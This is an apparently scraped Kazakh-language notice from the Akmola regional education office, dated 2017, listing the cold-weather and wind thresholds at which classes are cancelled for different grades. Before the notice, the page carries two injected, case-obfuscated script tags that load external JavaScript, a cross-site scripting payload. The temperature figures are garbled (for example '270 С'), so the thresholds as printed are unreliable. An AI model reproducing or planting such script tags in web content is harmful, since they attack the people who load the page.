<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.10.2017

Қыс кезінде білім беру ұйымдарында сабақты ауыстыру туралы.

Мектептердегі сабақ өткізуді тоқтату жөнінде ата - аналардан көптеген өтініштердің түсуіне байланысты Ақмола облысының білім басқармасы келесіні хабарлайды: Қазақстан Республикасы білім министрлігінің 2006 жылғы 27 қыркүйектегі № 509 бұйрығына сәйкес білім мекемелерінің температуралық жұмыс тәртібі бекітілген. Қазақстан Республикасы білім және ғылым министрлігінің 2010 жылғы 14 маусымдағы № 303 бұйрығымен аталған бұйрықтың қолданылуы жойылды және жергілікті атқарушы органдарға, сондай-ақ облыстардың Білім басқармаларына сыртқы ауа температурасының төмендеуіне байланысты білім беру ұйымдарындағы сабақтың температуралық тәртібін дайындау және тиісті қызметтермен келісу ұсынылды.

Жоғарыда баяндалғандар негізінде, төмендегі жағдайларда сабақ өткізу тоқтатылады:

Желдің жылдамдығы секундына кемінде 2 метр болғанда:

-   1 – 4 -  сынып оқушылары үшін сыртқы ауа температурасы – 270 С

-   1 – 9 -  сынып оқушылары үшін сыртқы ауа температурасы – 300 С

-   10 – 11  сынып оқушылары (колледждердің 1 - 2 курстары) үшін сыртқы ауа температурасы – 350 С және одан төмен.

Желдің жылдамдығы секундына 2 метр және одан жоғары болғанда:

-    1 - 4 - сынып оқушылары үшін сыртқы ауа температурасы – 250 С

-    1 - 9 - сынып оқушылары үшін сыртқы ауа температурасы – 270 С

-    10 - 11 сынып оқушылары (колледждердің 1 - 2 курстары) үшін сыртқы ауа температурасы – 300 С және одан төмен.

Просмотров: 754


Пікір қосу



Деректерді қолтаңбаға қосу